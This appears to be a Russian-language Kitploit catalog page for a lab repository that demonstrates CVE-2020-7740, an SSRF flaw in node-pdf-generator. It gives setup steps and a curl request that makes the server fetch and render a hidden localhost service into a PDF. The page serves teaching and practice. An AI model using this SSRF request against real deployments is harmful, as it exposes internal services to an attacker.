Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
node-pdf-generator-ssrf — Пример CVE-2020-7740 | Kitploit
Инструменты/GitHubGitHub/cs4239-u6/node-pdf-generator-ssrf
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubcs4239-u6/node-pdf-generator-ssrf

node-pdf-generator-ssrf

Пример CVE-2020-7740

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-7740

Это затрагивает все версии пакета node-pdf-generator. Из-за отсутствия проверки и очистки пользовательского ввода, передаваемого в node-pdf-generator, злоумышленник может создать URL, который будет передан внешнему серверу, что позволяет провести SSRF-атаку.

Источник

Быстрый старт с Docker

  1. Соберите контейнер с помощью
  2. Запустите контейнер с помощью docker run -p 3000:3000 cve-2020-7740
  3. Обратите внимание, что мы не можем напрямую посетить localhost:3001
  4. Отправьте запрос с помощью curl, используя curl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdf
  5. Просмотрите test.pdf, чтобы увидеть веб-сайт localhost, который должен быть скрыт.

Быстрый старт без Docker

  1. Клонируйте проект с помощью git clone {link to be inserted}
  2. Установите зависимости с https://wkhtmltopdf.org/
  3. Запустите сервер с помощью node .\NodePdfGeneratorServer сервер будет работать на адресе localhost:3000
  4. Установите зависимости скрытого сервера Python с помощью python3 -m pip install -r requirements.txt
  5. Запустите скрытый сервер с помощью python3 HiddenService сервер будет работать на адресе 'localhost:3001`

Как это работает?

  1. GET-запрос с телом отправляется на сервер. Это можно сделать с помощью curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdf
  2. Это сохранит копию HTML-страницы http://www.google.com в файл test.pdf

Почему это уязвимо?

  1. Другие URL-адреса, передаваемые серверу, будут посещены сервером, чтобы он мог преобразовать веб-сайт в PDF.
  2. Это позволяет пользователю подделать запрос к серверу, передав ему внутренний IP-адрес для атаки.

Дополнительная информация о CVE-2020-7740

  1. Vicarius.io
  2. NVD
  3. Оригинальный репозиторий
Скачать инструмент